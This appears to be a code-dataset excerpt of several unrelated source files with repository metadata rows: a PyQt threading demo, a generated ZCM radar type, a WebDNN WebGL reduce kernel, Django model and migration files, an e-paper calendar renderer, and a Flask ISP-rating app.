display.texttoset = "i have changed by a QThread"#set the text wich the changetext function will display
self.emit(QtCore.SIGNAL("anysignalname(bool)"),
True) #we send the signal called "anysignalname" and send a bool argument
time.sleep(1)#sleep for 1 sec
gui()#refresh the gui
display.texttoset = "back all over again for " + s + " time"#set the text wich the changetext function will display
self.emit(QtCore.SIGNAL("anysignalname(bool)"),
True) #we send the signal called "anysignalname" and send a bool argument
time.sleep(1)#sleep for 1 sec
gui()#refresh the gui
x = x + 1 #increase x value
display.texttoset = "QThread has finished!!"#set the text wich the changetext function will display
self.emit(QtCore.SIGNAL("anysignalname(bool)"),
True) #we send the signal called "anysignalname" and send a bool argument
time.sleep(1)#sleep for 1 sec
gui()#refresh the gui
thread1 = mythread()#we make a thread object
def start():
thread1.start()
def connecter():#a function that will connect signals
QtCore.QObject.connect(ui.button, QtCore.SIGNAL("clicked()"),
start)#connect the button when clicked with the start function
QtCore.QObject.connect(thread1, QtCore.SIGNAL("anysignalname(bool)"),
ui.changetext)#connect the thread1 object with the changetext function with the "anysignalname" signal that sends a bool value
ui.dialog.show()#show the dialog
connecter()#connect signals
ui.app.exec_()#start the app main loop
| [
"[email protected]"
] | |
bd031ca3faf9692f3fb3882ce3bc08d8ac7d2d09 | 1bf76b07d880ca31e1d10b8b9e24a4a8924fcfc1 | /zcm_types/radar_conti/py_types/ZcmRadarContiClustersScan.py | f6c388403515cf037c2215aa94ccd473a6b42651 | [] | no_license | Sher10k/ZCM_gui_player | c02498477f732094c748bfd990c78973ce3e5794 | f590fe3ed877ecf56b4f91981b66e291027f233f | refs/heads/master | 2021-01-04T03:47:34.211248 | 2020-02-16T23:18:39 | 2020-02-16T23:18:39 | 240,367,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,734 | py | """ZCM type definitions
This file automatically generated by zcm.
DO NOT MODIFY BY HAND!!!!
"""
try:
import cStringIO.StringIO as BytesIO
except ImportError:
from io import BytesIO
import struct
from ZcmRadarContiCluster import ZcmRadarContiCluster
from ZcmService import ZcmService
class ZcmRadarContiClustersScan(object):
__slots__ = ["service", "scan_size", "clusters"]
def __init__(self):
self.service = ZcmService()
self.scan_size = 0
self.clusters = []
def encode(self):
buf = BytesIO()
buf.write(ZcmRadarContiClustersScan._get_packed_fingerprint())
self._encode_one(buf)
return buf.getvalue()
def _encode_one(self, buf):
assert self.service._get_packed_fingerprint() == ZcmService._get_packed_fingerprint()
self.service._encode_one(buf)
buf.write(struct.pack(">h", self.scan_size))
for i0 in range(self.scan_size):
assert self.clusters[i0]._get_packed_fingerprint() == ZcmRadarContiCluster._get_packed_fingerprint()
self.clusters[i0]._encode_one(buf)
def decode(data):
if hasattr(data, 'read'):
buf = data
else:
buf = BytesIO(data)
if buf.read(8) != ZcmRadarContiClustersScan._get_packed_fingerprint():
raise ValueError("Decode error")
return ZcmRadarContiClustersScan._decode_one(buf)
decode = staticmethod(decode)
def _decode_one(buf):
self = ZcmRadarContiClustersScan()
self.service = ZcmService._decode_one(buf)
self.scan_size = struct.unpack(">h", buf.read(2))[0]
self.clusters = []
for i0 in range(self.scan_size):
self.clusters.append(ZcmRadarContiCluster._decode_one(buf))
return self
_decode_one = staticmethod(_decode_one)
_hash = None
def _get_hash_recursive(parents):
if ZcmRadarContiClustersScan in parents: return 0
newparents = parents + [ZcmRadarContiClustersScan]
tmphash = (0x3e4c48c585f0ea97+ ZcmService._get_hash_recursive(newparents)+ ZcmRadarContiCluster._get_hash_recursive(newparents)) & 0xffffffffffffffff
tmphash = (((tmphash<<1)&0xffffffffffffffff) + ((tmphash>>63)&0x1)) & 0xffffffffffffffff
return tmphash
_get_hash_recursive = staticmethod(_get_hash_recursive)
_packed_fingerprint = None
def _get_packed_fingerprint():
if ZcmRadarContiClustersScan._packed_fingerprint is None:
ZcmRadarContiClustersScan._packed_fingerprint = struct.pack(">Q", ZcmRadarContiClustersScan._get_hash_recursive([]))
return ZcmRadarContiClustersScan._packed_fingerprint
_get_packed_fingerprint = staticmethod(_get_packed_fingerprint)
| [
"[email protected]"
] | |
786eb25c7e387dd452a84dd798b224c7a20eaa98 | 5b4fe473179b5fadaf59ec96d55b2ec4cb326f65 | /src/graph_transpiler/webdnn/backend/webgl/kernels/reduce.py | 213fb08c2ab5753e04407908731bd158bdf8fcba | [
"Zlib",
"MIT"
] | permissive | TarrySingh/webdnn | 13d3f1ec4936916abacfb67e270f48571e2fcff2 | b31b19de0798d8ca198b78d19cb06e4fce1bc260 | refs/heads/master | 2021-05-07T02:24:47.500746 | 2017-11-13T13:00:24 | 2017-11-13T13:00:24 | 110,582,816 | 0 | 1 | null | 2017-11-13T18:03:46 | 2017-11-13T18:03:46 | null | UTF-8 | Python | false | false | 6,293 | py | from collections import namedtuple
from typing import Type, Dict, Callable, Union
from webdnn.backend.code_generator.injectors.kernel_name_injector import KernelNameInjector
from webdnn.backend.webgl.generator import WebGLDescriptorGenerator
from webdnn.backend.webgl.kernel import Kernel
from webdnn.backend.webgl.kernels.util import texture_stride, texture_shape, FragmentShaderPreamble, simplify_orders
from webdnn.backend.webgl.uniform_injector import UniformInjector
from webdnn.graph.axis import AxisKeyDict
from webdnn.graph.operators.elementwise import Elementwise
from webdnn.graph.operators.reduce import Reduce
from webdnn.util.misc import mul
RegisteredItem = namedtuple('RegisteredItem', ['OperatorClass',
'pre_reduction_snippet',
'body_snippet',
'post_reduction_snippet',
'parameters'])
_registered_items = {} # type: Dict[Type[Elementwise], RegisteredItem]
def _generate_template_convert_position(op: Reduce, reduction_size: int):
uniform_snippets = [f"""
%%UNIFORM(sampler2D, sampler_x)%%;
%%UNIFORM(vec2, texture_shape_x)%%;
%%UNIFORM(vec2, texture_stride_x)%%;
%%UNIFORM(vec4, variable_shape_x)%%;
%%UNIFORM(vec4, variable_stride_x)%%;
"""]
for key, callable in _registered_items[op.__class__].parameters.items():
typename = "float" if isinstance(callable(op), float) else "int"
uniform_snippets.append(f"%%UNIFORM({typename}, {key})%%;")
pre_reduction_snippet = _registered_items[op.__class__].pre_reduction_snippet
body_snippet = _registered_items[op.__class__].body_snippet
post_reduction_snippet = _registered_items[op.__class__].post_reduction_snippet
uniform_snippet = "\n".join(uniform_snippets)
return FragmentShaderPreamble + f"""
%%UNIFORM(vec2, texture_stride_y)%%;
%%UNIFORM(vec4, variable_shape_y)%%;
%%UNIFORM(vec4, variable_stride_y)%%;
{uniform_snippet}
void main() {{
vec4 variable_position_y = convert_position(gl_FragCoord.xy, texture_stride_y, variable_stride_y, variable_shape_y);
vec4 variable_position_x = mod(variable_position_y, variable_shape_x); // broadcast
const int n_x = {reduction_size};
float y;
{pre_reduction_snippet}
for (int i_x = 0; i_x < {reduction_size}; i_x++) {{
variable_position_x.w = float(i_x) + 0.5;
float x = texture2D(sampler_x, convert_coord(variable_position_x, variable_stride_x, texture_stride_x, texture_shape_x)).r;
{{
{body_snippet}
}}
}}
{post_reduction_snippet}
gl_FragColor = vec4(y, 0, 0, 0);
}}
"""
def register_reduction_kernel(OperatorClass: Type[Reduce],
body_snippet: str,
pre_reduction_snippet: str = "",
post_reduction_snippet: str = "",
parameters: Dict[str, Callable[[Reduce], Union[int, float]]] = None):
"""
register reduction kernel
you can use follow pre-defined variables in all snippets.
- `y` output value.
- `n_x` number of input elements (readonly).
Also you can use follow variables only in body snippet.
- `x` each input element (readonly)
- `i_x` current `x`'s index (readonly)
.. Examples:: Define a kernel which returns maximum value
register_reduction_kernel(
Max,
pre_reduction_snippet="y = -1.0e10;", // initialize "y" with very smalle value
body_snippet="y = x > y ? x : y;",
)
"""
WebGLDescriptorGenerator.register_handler(OperatorClass)(reduce_kernel)
_registered_items[OperatorClass] = RegisteredItem(
OperatorClass=OperatorClass,
pre_reduction_snippet=pre_reduction_snippet,
body_snippet=body_snippet,
post_reduction_snippet=post_reduction_snippet,
parameters={} if parameters is None else parameters
)
def reduce_kernel(op: Reduce):
x = op.inputs["x"]
y = op.outputs["y"]
axis = op.axis
orders, shape_dicts = simplify_orders([x, y], keep_axes=[axis])
# Padding shapes and strides to 4D
if orders[y].ndim > 4:
raise NotImplementedError(f"Too large number of dimension: {y}")
shapes = {v: [shape_dicts[v][a] for a in orders[v].axes] for v in [x, y]}
strides = {v: [mul(shapes[v][orders[v].axes_dict[a] + 1:]) for a in orders[v].axes] for v in [x, y]}
stride_dicts = {v: AxisKeyDict(orders[v].axes, strides[v]) for v in [x, y]}
# Change x's shapes and strides order to same as y's order
x_virtual_shape = [shape_dicts[x][a] if a in orders[x].axes else 1 for a in orders[y].axes]
x_virtual_stride = [stride_dicts[x][a] if a in orders[x].axes else 1 for a in orders[y].axes]
while len(x_virtual_shape) < 3:
x_virtual_stride.append(1)
x_virtual_shape.append(stride_dicts[x][axis])
x_virtual_shape.append(shape_dicts[x][axis])
x_virtual_stride.append(stride_dicts[x][axis])
y_virtual_shape = shapes[y]
y_virtual_stride = strides[y]
while len(y_virtual_shape) < 4:
y_virtual_stride.append(1)
y_virtual_shape.append(1)
name_injector = KernelNameInjector(op)
uniform_injector = UniformInjector()
uniform_injector.register({
"texture_stride_y": texture_stride(y),
"variable_shape_y": y_virtual_shape,
"variable_stride_y": y_virtual_stride,
f"sampler_x": x,
f"texture_shape_x": texture_shape(x),
f"texture_stride_x": texture_stride(x),
f"variable_shape_x": x_virtual_shape,
f"variable_stride_x": x_virtual_stride,
})
for name, callable in _registered_items[op.__class__].parameters.items():
uniform_injector.register({
name: callable(op)
})
# Computing logical position is required.
source = _generate_template_convert_position(op, reduction_size=shape_dicts[x][axis])
source = uniform_injector.inject(source)
source = name_injector.inject(source)
kernel = Kernel(
source,
name_injector.name,
uniform_injector.samplers,
uniform_injector.uniforms,
y
)
return [kernel]
| [
"[email protected]"
] | |
43851ca9d9d2b010e1506a6e2e040a1b3d240ad0 | 350873b97f470488678d5d24e595737f0fc3ced2 | /core/migrations/0033_auto_20170301_1258.py | 874e8230f20d432d24d948f6098c4f523a846acd | [] | no_license | Scaledesk/ase | a2435745f7fbae252eb7af30223d4d59e1070817 | 891b8d5945b554ae5666c146eca342d649d48ae7 | refs/heads/master | 2021-01-22T20:26:14.603745 | 2017-05-16T10:14:22 | 2017-05-16T10:14:22 | 85,322,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-03-01 12:58
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0032_auto_20170301_1238'),
]
operations = [
migrations.AlterField(
model_name='project',
name='profile',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='core.Profile'),
),
]
| [
"[email protected]"
] | |
6b6b96b46498ebc58ff5adf1dd527ed649ea1e5c | 3f19816f6027c0f6feaf53d1928cda9d77842c23 | /draw/__init__.py | 66d17fb048179455c6c026667c3b076cf2c695b4 | [
"MIT"
] | permissive | RyoheiTomiyama/e-paper-calendar | b6e8be83c587641021b2ded5b7ed350c85812eaa | d575ee62e96772a83daded2c9afcafcf8cab68c2 | refs/heads/main | 2023-07-01T21:42:37.629253 | 2021-08-08T07:06:48 | 2021-08-08T07:06:48 | 387,192,158 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,596 | py | from weather import Weather
import pytz
import calendar as cal
from datetime import date, datetime
from dateutil.parser import parse
from typing import List, Tuple
import numpy as np
from PIL import Image, ImageDraw, ImageFont
Width, Height = int, int
# image size
SIZE = (800, 480)
MAIN_WIDTH = 334
FONTS = dict(
en='./Fonts/Marcellus-Regular.ttf',
ja='./Fonts/NotoSansJP-Bold.otf',
num='./Fonts/Cardo-Regular.ttf',
title='./Fonts/PinyonScript-Regular.ttf',
number='./Fonts/Krungthep.ttf',
)
# color scale
COLORS = dict(
black=(0, 0, 0),
red=(255, 0, 0),
white=(255, 255, 255)
)
LOCALE = 'Asia/Tokyo'
WEEKDAY = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def get_calendar(year: int, month: int):
month_dates = cal.Calendar(cal.SUNDAY).monthdatescalendar(year, month)
return month_dates
class Draw:
# EPDで描画するときに、黒と赤を別画像から描画するので、2色の画像を用意する
# def display(self, imageblack, imagered):
img_black: Image.Image
img_red: Image.Image
draw_black: ImageDraw.ImageDraw
draw_red: ImageDraw.ImageDraw
today: date
def __init__(self):
# create a new image
self.img_black = Image.new('RGB', SIZE, COLORS['white'])
self.img_red = Image.new('RGB', SIZE, COLORS['white'])
self.draw_black = ImageDraw.Draw(self.img_black)
self.draw_red = ImageDraw.Draw(self.img_red)
self.today = date.today()
def get_font(self, name: str, size: int):
return ImageFont.truetype(FONTS[name], size)
def get_rect(self, text: str, font_name: str, font_size: int) -> Tuple[Width, Height]:
bbox = self.draw_black.multiline_textbbox(
(0, 0), text,
font = self.get_font(font_name, font_size)
)
width = bbox[2] - bbox[0]
height = bbox[3] - bbox[1]
return width, height
# https://pillow.readthedocs.io/en/stable/reference/ImageDraw.html#PIL.ImageDraw.ImageDraw.textsize
def get_textsize(self, text: str, font_name: str, font_size: int) -> Tuple[Width, Height]:
textsize = self.draw_black.multiline_textsize(
text,
font = self.get_font(font_name, font_size)
)
width = textsize[0]
height = textsize[1]
return width, height
def padding_width(self, width: int, text: str, font_name: str, font_size: int):
rect = self.get_rect(text, font_name, font_size)
return (width - rect[0]) // 2
def padding_height(self, height: int, text: str, font_name: str, font_size: int):
rect = self.get_rect(text, font_name, font_size)
textsize = self.get_textsize(text, font_name, font_size)
return (height - rect[1] + textsize[1]) // 2
def save_image(self, file_name: str = f'{SIZE[0]}x{SIZE[1]}'):
saved_image = Image.new('RGB', SIZE, COLORS['white'])
for x in range(SIZE[0]):
for y in range(SIZE[1]):
pixel_black = self.img_black.getpixel((x, y))
pixel_red = self.img_red.getpixel((x, y))
if pixel_black[0] != 255 or pixel_black[1] != 255 or pixel_black[2] != 255:
saved_image.putpixel((x, y), pixel_black)
if pixel_red[0] != 255 or pixel_red[1] != 255 or pixel_red[2] != 255:
saved_image.putpixel((x, y), pixel_red)
file_path = f'./output/{file_name}.bmp'
saved_image.save(file_path, 'bmp')
def convert_multiline_text(self, text: str, font_name: str, font_size: int, width):
lines: List[str] = []
line_text = ''
for i, t in enumerate(text):
rect = self.get_rect(
line_text + t,
font_name,
font_size
)
if rect[0] > width:
lines.append(line_text)
line_text = t
else:
line_text = line_text + t
if len(text) == i + 1:
lines.append(line_text)
return lines
def draw_monthly_calendar(self):
if not self.draw_black or not self.draw_red:
return
calendar = get_calendar(self.today.year, self.today.month)
# calendar = get_calendar(2018, 12)
month_size = 12
wrap_padding = 5
draw_width = MAIN_WIDTH - wrap_padding * 2
month_padding = self.padding_width(draw_width, self.today.strftime("%B"), 'number', month_size)
self.draw_black.multiline_text(
(month_padding + wrap_padding, 32 + 30 * 7),
self.today.strftime("%B"),
fill = COLORS['black'],
font = self.get_font('number', month_size),
)
month_size = 20
month_padding = self.padding_width(draw_width, str(self.today.month), 'number', month_size)
self.draw_black.multiline_text(
(month_padding + wrap_padding, 12 + 30 * 7),
str(self.today.month),
fill = COLORS['black'],
font = self.get_font('number', month_size),
)
w_day = draw_width // 7
x_start: np.ndarray = np.arange(7) * w_day
weekday_s = ['S', 'M', 'T', 'W', 'T', 'F', 'S']
for i, text in enumerate(weekday_s):
w_pad = self.padding_width(w_day, text, 'number', 12)
color = COLORS['red'] if i == 0 else COLORS['black']
draw = self.draw_red if i == 0 else self.draw_black
draw.multiline_text(
(x_start[i] + w_pad + wrap_padding, 270),
text,
font = self.get_font('number', 12),
fill = color,
)
if color == COLORS['red']:
self.draw_black.multiline_text(
(x_start[i] + w_pad + wrap_padding, 270),
text,
font = self.get_font('number', 12),
fill = COLORS['black'],
)
# show the dates
for h, row in enumerate(calendar):
for i, d in enumerate(row):
text = d.day
if text == 0:
continue
w_pad = self.padding_width(w_day, str(text), 'number', 16)
color = COLORS['black']
draw = self.draw_black
if i == 0:
color = COLORS['red']
draw = self.draw_red
if d.month is not self.today.month:
color = (160, 160, 160)
draw = self.draw_black
# color = COLOR['red'] if i == 0 or text in holidays else COLOR['black']
draw.multiline_text(
(x_start[i] + w_pad + wrap_padding, 300 + 30 * h),
str(text),
font = self.get_font('number', 16),
fill = color
)
if color == COLORS['red']:
self.draw_black.multiline_text(
(x_start[i] + w_pad + wrap_padding, 300 + 30 * h),
str(text),
font = self.get_font('number', 16),
fill = COLORS['black']
)
def draw_schedules(self, schedules):
wrap_padding = 5
h_schedule = (SIZE[1] - wrap_padding * 2) // 10
font_size = 15
for i, schedule in enumerate(schedules):
s_name: str = schedule['name']
s_datetime: datetime = schedule['datetime']
s_datetime = s_datetime.astimezone(pytz.timezone(LOCALE))
if s_name is None or s_datetime is None:
continue
# draw date
# if i > 0:
prev_schedule_datetime: datetime = schedules[i - 1]['datetime']
is_same_date = s_datetime.strftime('%m/%d') == prev_schedule_datetime.astimezone(pytz.timezone(LOCALE)).strftime('%m/%d')
if not is_same_date:
s_date = s_datetime.strftime('%m/%d')
h_pad = self.padding_height(h_schedule, s_date, 'number', font_size)
self.draw_black.multiline_text(
(10 + MAIN_WIDTH, wrap_padding + h_pad + (h_schedule * i) + 1),
s_date,
font = self.get_font('number', font_size),
anchor = 'lm',
fill = COLORS['black']
)
# draw time
s_time = s_datetime.strftime('%H:%M')
h_pad = self.padding_height(h_schedule, s_time, 'number', font_size)
rect = self.get_rect(s_time, 'number', font_size)
self.draw_black.multiline_text(
(70 + MAIN_WIDTH, wrap_padding + h_pad + (h_schedule * i)),
s_time,
font = self.get_font('number', font_size),
anchor = 'lm',
fill = COLORS['black'],
)
# draw line for date
line_start = wrap_padding + (h_pad // 2) + (h_schedule * i)
line_end = line_start + rect[1] + (h_pad // 2)
if is_same_date:
line_start = line_start - (h_schedule // 2)
self.draw_black.line(
((126 + MAIN_WIDTH, line_start), (126 + MAIN_WIDTH, line_end)),
fill = COLORS['black'],
width = 1,
)
# draw schedule title
lines = self.convert_multiline_text(s_name, 'ja', font_size, SIZE[0] - MAIN_WIDTH)
text = str('\n'.join(lines[:3]))
h_pad = self.padding_height(h_schedule, text, 'ja', font_size)
self.draw_black.multiline_text(
(140 + MAIN_WIDTH, wrap_padding + h_pad + (h_schedule * i)),
text,
font = self.get_font('ja', font_size),
anchor = 'lm',
fill = COLORS['black']
)
def draw_today(self):
wrap_padding = 5
month_text = str(self.today.month) + '/'
month_font_name = 'number'
month_font_size = 24
self.draw_black.multiline_text(
(wrap_padding + 5, wrap_padding + 18),
month_text,
font = self.get_font(month_font_name, month_font_size),
fill = COLORS['black']
)
month_textsize = self.get_textsize(month_text, month_font_name, month_font_size)
day_text = str(self.today.day)
day_font_name = 'number'
day_font_size = 50
self.draw_black.multiline_text(
(month_textsize[0] + 10, wrap_padding + 10),
day_text,
font = self.get_font(day_font_name, day_font_size),
fill = COLORS['black']
)
day_textsize = self.get_textsize(day_text, day_font_name, day_font_size)
week_text = WEEKDAY[self.today.weekday()]
week_font_name = 'number'
week_font_size = 24
self.draw_black.multiline_text(
(month_textsize[0] + day_textsize[0] + 15, wrap_padding + 36),
week_text,
font = self.get_font(week_font_name, week_font_size),
fill = COLORS['black']
)
def draw_weather(self, weather: Weather):
font_name = 'number'
temp_text = f'{weather.temp.current}°'
temp_font_size = 54
self.draw_black.multiline_text(
(175, 110),
temp_text,
font = self.get_font(font_name, temp_font_size),
fill = COLORS['black'],
)
info_font_size = 18
info_text = f'{weather.temp.min}°/{weather.temp.max}°'
self.draw_black.multiline_text(
(206, 55),
info_text,
font = self.get_font(font_name, info_font_size),
fill = COLORS['black'],
)
temp_img = Image.open('./assets/images/temp.jpg', )
self.img_black.paste(temp_img, (177, 54))
info_text = f'{weather.humidity}%'
self.draw_black.multiline_text(
(206, 25),
info_text,
font = self.get_font(font_name, info_font_size),
fill = COLORS['black'],
)
temp_img = Image.open('./assets/images/humidity.jpg', )
self.img_black.paste(temp_img, (177, 23))
weather_img = Image.open(f'./assets/images/{weather.icon}.jpg', )
self.img_black.paste(weather_img, (27, 85))
def draw_separate_line(self):
self.draw_black.line(
((MAIN_WIDTH, 0), (MAIN_WIDTH, SIZE[1])),
fill = COLORS['black'],
width = 2,
)
| [
"[email protected]"
] | |
356ef9e3329de23e51cf1e0cc01be397e47d74ff | 0b8edff80aafabb8464c7306307fd26c1f45998f | /account/models.py | 3100ac39f732c35f45b558050ec14d6ec4bf4dd6 | [] | no_license | Aizdylagady/python9_shop | 4c2fa00cc4d9515ffadc8bd202a665dfbb4dad2c | 79103e944fd71a2571abf6000963a85ed8b53645 | refs/heads/master | 2023-03-10T11:37:12.549005 | 2021-02-24T08:33:15 | 2021-02-24T08:33:15 | 340,354,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,596 | py | from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
from django.db import models
# Create your models here.
class UserManager(BaseUserManager):
def _create_user(self, email, password, **extra_fields):
if not email:
raise ValueError('Email is required')
email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create(self, email, password, **extra_fields):
extra_fields.setdefault('is_superuser', False)
return self._create_user(email, password, **extra_fields)
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_superuser', True)
extra_fields.setdefault('is_active', True)
extra_fields.setdefault('is_staff', True)
if extra_fields.get('is-superuser') is False:
raise ValueError('Super users must have is_superuser=True')
return self._create_user(email, password, **extra_fields)
class User(AbstractBaseUser):
email = models.EmailField(max_length=100, primary_key=True) # primary key - атрибут true- значение
is_active = models.BooleanField(default=False)
name = models.CharField(max_length=100, blank=True)
last_name = models.CharField(max_length=100, blank=True)
is_superuser = models.BooleanField(default=False)
is_staff = models.BooleanField(default=False)
activation_code = models.CharField(max_length=15, blank=True) # via email
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = UserManager()
def has_perm(self, perm, pbj=None):
return self.is_superuser
def has_module_perms(self, app_label):
return self.is_staff
# TODO: Отображение продуктов и категорий
# TODO: Регистрация Активация Логин
# TODO: Загрузка и отображение картинок
# TODO: Верстка
# TODO: Формы
# TODO: CRUD
# TODO: Поиск и фильтрация
# TODO: Пагинация
# TODO: смена пароля
# TODO: забыли пароль
# TODO: smtp
def create_activation_code(self):
from django.utils.crypto import get_random_string
code = get_random_string(15)
if User.objects.filter(activation_code=code).exists():
self.create_activation_code()
self.activation_code = code
self.save(update_fields=['activation_code'])
| [
"[email protected]"
] | |
4472e211cff9d0c13eac53c06d7b05c6e7a0850b | 540c789a69a4622cf2b5c4348df60530a4807587 | /oculus.py | 782bbe711619bd535a0f67bc18ac8756b390bbe5 | [] | no_license | npmcdn-to-unpkg-bot/oculus | d8ff3da3bdde7a7c52b77ff6db370fb432b638b4 | f6878c5f691b7e3dab785d876d6db7cbf2f53b58 | refs/heads/master | 2020-12-28T22:11:18.866417 | 2016-08-06T08:24:58 | 2016-08-06T08:24:58 | 67,377,471 | 0 | 0 | null | 2016-09-05T01:14:28 | 2016-09-05T01:14:27 | null | UTF-8 | Python | false | false | 9,168 | py | from flask import Flask, request, redirect, url_for, render_template, flash, g
from flask_login import LoginManager, login_required, login_user, logout_user, current_user
from sqlalchemy import func
from utils import *
app = Flask(__name__)
app.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = '/login'
@app.route('/')
def index():
return render_template('home.html')
@app.route('/welcome')
@login_required
def welcome():
isp_entries, services_entries, ratings_entries, servicemetric_entries = dropdown()
return render_template('welcome.html', isp_entries=isp_entries, services_entries=services_entries,
ratings_entries=ratings_entries, servicemetric_entries=servicemetric_entries)
@app.route('/react')
def react():
return render_template('react.html')
@app.route('/survey')
@login_required
def survey():
isp_entries, services_entries, ratings_entries, servicemetric_entries = dropdown()
return render_template('take_survey.html', isp_entries=isp_entries, services_entries=services_entries,
ratings_entries=ratings_entries, servicemetric_entries=servicemetric_entries)
@app.route('/home')
def home():
return render_template('home.html')
@app.route('/view_my_ratings', methods=['GET', 'POST'])
@login_required
def view_my_ratings():
# my_service_ratings = Service_metric_ratings.query.filter_by(user_id=g.user.user_id).order_by(
# Service_metric_ratings.pub_date.desc()).all()
my_service_ratings = db.session.query(User.email, Isps.isp_name, Service_metric.metric_name, Services.service_name,
Ratings.ratings_value, Ratings.ratings_comment,
Service_metric_ratings.custom_rating_comment, Service_metric_ratings.pub_date) \
.filter(Service_metric_ratings.user_id == User.user_id) \
.filter(Service_metric_ratings.ratings_value == Ratings.ratings_value) \
.filter(Service_metric_ratings.service_id == Services.service_id) \
.filter(Service_metric_ratings.metric_id == Service_metric.metric_id) \
.filter(Service_metric_ratings.isp_id == Isps.isp_id) \
.filter_by(user_id=g.user.user_id) \
.order_by(Service_metric_ratings.pub_date.desc()).all()
# for i in my_service_ratings:
# print i.Isps.isp_name
return render_template('view_my_ratings.html', my_service_ratings=my_service_ratings)
@app.route('/build_service_report', methods=['GET', 'POST'])
@login_required
def build_service_report():
isp_entries, services_entries, ratings_entries, servicemetric_entries = dropdown()
return render_template('query_average_isp_ratings.html', isp_entries=isp_entries, services_entries=services_entries,
servicemetric_entries=servicemetric_entries)
@app.route('/view_average_isp_ratings', methods=['GET', 'POST'])
@login_required
def view_average_isp_ratings():
if request.method == 'GET':
return render_template('query_average_isp_ratings.html')
metric_name = request.form['metric_name']
service_name = request.form['service_name']
if not metric_name:
flash('KPI is required', 'danger')
elif not service_name:
flash('service_name is required', 'danger')
else:
isp_ratings_per_service = db.session.query(func.count(Ratings.ratings_value).label('count_of_users'),
func.sum(Ratings.ratings_value).label('sum_of_ratings'),
func.avg(Ratings.ratings_value).label('avg_of_ratings'),
Isps.isp_name, Service_metric.metric_name, Services.service_name) \
.filter(Service_metric_ratings.isp_id == Isps.isp_id) \
.filter(Service_metric_ratings.ratings_value == Ratings.ratings_value) \
.filter(Service_metric_ratings.metric_id == Service_metric.metric_id) \
.filter(Service_metric_ratings.user_id == User.user_id) \
.filter(Service_metric_ratings.service_id == Services.service_id) \
.filter(Service_metric.metric_name == metric_name) \
.filter(Services.service_name == service_name) \
.group_by(Isps.isp_name)
ratings_table_values = db.session.query(Ratings.ratings_value, Ratings.ratings_comment)
# for i in isp_ratings_per_service:
# print(i.isp_name, i.service_name, i.metric_name, (round(i.avg_of_ratings)))
# ratings_table_values = Ratings.query.filter_by(rating_value=(round(i.avg_of_ratings)))
return render_template('view_average_isp_ratings.html',
isp_ratings_per_service=isp_ratings_per_service,
ratings_table_values=ratings_table_values)
@app.route('/rate_isp_service', methods=['GET', 'POST'])
@login_required
def rate_isp_service():
isp_entries, services_entries, ratings_entries, servicemetric_entries = dropdown()
if request.method == 'POST':
metric_id = request.form['metric_id']
isp_id = request.form['isp_id']
service_id = request.form['service_id']
ratings_value = request.form['ratings_value']
custom_rating_comment = request.form['custom_rating_comment']
if not metric_id:
flash('KPI is required', 'danger')
elif not isp_id:
flash('ISP is required', 'danger')
elif not service_id:
flash('service_name is required', 'danger')
elif not ratings_value:
flash('ratings_id is required', 'danger')
elif not custom_rating_comment:
flash('custom_rating_comment is required', 'danger')
else:
user_service_ratings = Service_metric_ratings(metric_id, isp_id, service_id, ratings_value,
custom_rating_comment)
exists = db.session.query(Service_metric_ratings.user_id, Service_metric_ratings.metric_id, Service_metric_ratings.service_id,
Service_metric_ratings.isp_id) \
.filter(Service_metric_ratings.metric_id == metric_id, \
Service_metric_ratings.isp_id == isp_id, \
Service_metric_ratings.service_id == service_id) \
.filter_by(user_id=g.user.user_id).count()
if exists:
flash('You have already provided ratings for this service , edit it instead', 'danger')
else:
user_service_ratings.user = g.user
db.session.add(user_service_ratings)
db.session.commit()
flash('Data successfully Added', 'success')
return render_template('rate_isp_service.html', isp_entries=isp_entries, services_entries=services_entries,
ratings_entries=ratings_entries, servicemetric_entries=servicemetric_entries)
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
password = request.form['password']
email = request.form['email']
user = User(password, email)
exists = db.session.query(User.user_id).filter_by(email=email).scalar() is not None
if exists:
flash(email + ' is already registered , Login if you remember the password ', 'danger')
return render_template('login.html')
else:
db.session.add(user)
db.session.commit()
flash('User successfully registered', 'success')
return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
email = request.form['email']
password = request.form['password']
remember_me = False
if 'remember_me' in request.form:
remember_me = True
registered_user = User.query.filter_by(email=email).first()
if registered_user is None:
flash('Your Username and Password dont exist', 'danger')
return redirect(url_for('login'))
if not registered_user.check_password(password):
flash('Password is invalid', 'danger')
return redirect(url_for('login'))
else:
login_user(registered_user, remember=remember_me)
# flash('Thank you ' + email + ' for using our site ,we greatly appreciate you sharing your experiences', 'success')
return redirect(request.args.get('next') or url_for('rate_isp_service'))
@app.route('/logout')
@login_required
def logout():
logout_user()
flash('You have logged out ,thank you for your contribution', 'success')
return redirect(url_for('login'))
@login_manager.user_loader
def user_loader(email):
"""Given *user_id*, return the associated User object.
:param unicode user_id: user_id (email) user to retrieve
"""
return User.query.get(str(email))
@app.before_request
def before_request():
g.user = current_user
if __name__ == '__main__':
app.run(debug=True) | [
"[email protected]"
] | |
